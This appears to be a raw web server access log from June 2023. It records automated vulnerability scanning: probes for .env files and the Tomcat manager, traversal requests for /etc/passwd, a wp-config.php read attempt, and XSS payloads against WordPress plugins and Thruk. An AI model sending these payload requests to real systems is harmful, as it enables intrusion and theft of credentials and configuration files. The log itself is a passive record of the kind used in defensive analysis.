107.189.31.184 - - [18/Jun/2023:20:24:30 +0530] "GET /.env_sample HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:20:24:33 +0530] "GET /.env.51 HTTP/1.1" 404 1008
107.189.31.184 - - [18/Jun/2023:20:24:36 +0530] "GET /.env.103.145 HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:20:24:38 +0530] "GET /api/.env HTTP/1.1" 404 1010
193.29.13.175 - - [18/Jun/2023:20:25:02 +0530] "-" 400 -
107.189.31.184 - - [18/Jun/2023:20:25:18 +0530] "GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1" 404 1096
107.189.31.184 - - [18/Jun/2023:20:25:18 +0530] "GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1" 404 1096
41.186.73.134 - - [18/Jun/2023:20:25:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:20:26:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:27:41 +0530] "GET /?aam-media=wp-config.php HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:27:41 +0530] "GET /?aam-media=wp-config.php HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:27:52 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:27:52 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:20:29:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:20:30:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:31:52 +0530] "GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1118
107.189.31.184 - - [18/Jun/2023:20:31:53 +0530] "GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1118
41.186.73.134 - - [18/Jun/2023:20:34:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:34:29 +0530] "GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1" 404 1088
107.189.31.184 - - [18/Jun/2023:20:34:29 +0530] "GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1" 404 1088
41.186.73.134 - - [18/Jun/2023:20:35:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:35:15 +0530] "GET /en/WEB-INF/web.xml;.js HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:20:35:15 +0530] "GET /en/WEB-INF/web.xml;.js HTTP/1.1" 404 1038
41.186.73.134 - - [18/Jun/2023:20:38:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
141.98.11.207 - - [18/Jun/2023:20:38:27 +0530] "GET / HTTP/1.1" 200 11250
209.141.41.129 - - [18/Jun/2023:20:39:11 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:20:39:18 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:20:39:18 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:20:39:20 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:39:21 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:20:39:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:39:57 +0530] "GET /thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:20:39:57 +0530] "GET /thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1040
